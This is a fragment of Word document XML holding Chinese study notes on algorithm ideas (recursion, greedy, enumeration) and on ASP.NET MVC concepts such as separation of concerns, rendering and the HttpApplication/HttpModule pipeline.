          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(真正的编程应该是：编程=XX语言+数据结构+算法)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>递推思想</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>概念</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
        </w:rPr>
        <w:t>通过已知条件，利用特定关系逐步递推，最终得到结果为止，核心就是不断的利用现有信息推导出新的东西。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分类：“顺推”，“逆推”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“顺推”是指通过条件推出结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“逆推”是指通过结果推出条件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子：“斐波那契”数列，银行取钱</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="24"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>递归思想</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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能进则进，不进则退”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>三要素：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> 递归中每次循环都必须使问题规模有所缩小。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> 递归操作的每两步都是有紧密的联系，如在“递归”的“归操作时”，前一次的输出就是后一次的输入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> 当子问题的规模足够小时，必须能够直接求出该规模问题的解，其实也就是必须要有结束递归的条件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注意事项：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>深层次的递归会涉及到频繁进栈出栈和分配内存空间，所以运行效率比较低，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>当问题规模较大时，不推荐使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在递归过程中，每次调用中的参数，方法返回点，局部变量都是存放在堆栈中的，如果当问题规模非常大时，容易造成堆栈溢出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>例子：阶乘，十进制转二进制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>贪心思想</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>贪心算法（又称贪婪算法）是指，在对</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://baike.baidu.com/item/%E9%97%AE%E9%A2%98%E6%B1%82%E8%A7%A3" \t "https://baike.baidu.com/item/%E8%B4%AA%E5%BF%83%E7%AE%97%E6%B3%95/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="136EC2"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>问题求解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="136EC2"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>时，总是做出在当前看来是最好的选择。也就是说，不从整体最优上加以考虑，他所做出的是在某种意义上的局部</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://baike.baidu.com/item/%E6%9C%80%E4%BC%98%E8%A7%A3" \t "https://baike.baidu.com/item/%E8%B4%AA%E5%BF%83%E7%AE%97%E6%B3%95/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="136EC2"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最优解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="136EC2"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注意事项：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>不能保证贪心所得出的解是整体最优的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>不能用来求最大解和最小解问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>只能求满足某些约束条件的可行解的范围。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>例子：背包问题，找零钱</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>枚举思想</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将问题的所有可能的答案一一列举，然后根据条件判断此答案是否合适，保留合适的，舍弃不合适的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>枚举是我们在无奈之后的最后一击，那么使用枚举时我们应该尽量遵守下面的两个条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>地球人都不能给我找出此问题的潜在规律。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>候选答案的集合是一个计算机必须能够承受的。</w:t>
      </w:r>
    </w:p>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ASP.NET MVC框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP.NET MVC，前者代码支撑该应用框架的技术平台，它表明ASP.NET MVC和传统的Web Forms应用框架一样，都是建立在ASP.NET平台上的；后者表示该框架背后的设计思想，意味着ASP.NET MVC采用了MVC的架构模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个典型的人机交互应用具有三个主要的关注点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>数据的呈现，UI处理逻辑和业务逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>自治视图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将三种柔和在了一起，势必会带来以下三个问题：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>可测试性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>稳定性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>重用性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解决问题的办法是采用“关注点分离”，将数据的呈现，UI处理逻辑和业务逻辑三者分离出来。这里采用的模式就是MVC。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面动态输出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web页面从服务器到浏览器的整个呈现过程实际上是分三步：第一步是通过视图引擎对视图文件进行解释，将视图文件中的代码转成HTML代码，这一步叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>渲染</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；第二步是将渲染后的HTML标记传递给客户端浏览器，这一步是页面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>传递</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；第三步是浏览器接收到HTML后对其进行处理并呈现为Web页面，这一步才叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>呈现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。由此可见，渲染是把页面的非HTML代码转成HTML标记，这一步是由服务器完成的。而呈现是把HTML标记显示成Web页面，这一步工作是由浏览器完成的。渲染和呈现是整个页面处理过程两个不同的阶段，更不能把这两步工作混谈只有“呈现”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>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ASP.NET管道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HttpApplication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:left="90"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTPApplication是整个ASP.NET的核心，它负责处理分发给它的HTTP请求。由于一个HTTPApplication对象在某一个时刻只能处理一个请求，只有完成对某个请求的处理后才能用于后续请求的处理，所以ASP.NET采用对象池的方式来创建或获取HTTPApplication对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:left="90"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HttpModule</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:left="90"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ASP.NET拥有一个具有高度可拓展性的引擎，并且能够处理对于不同资源类型的请求。那么是什么成就了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ASP.NET的拓展性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>呢？HttpModule功不可没。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:ind w:left="90"/>
        <w:rPr>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
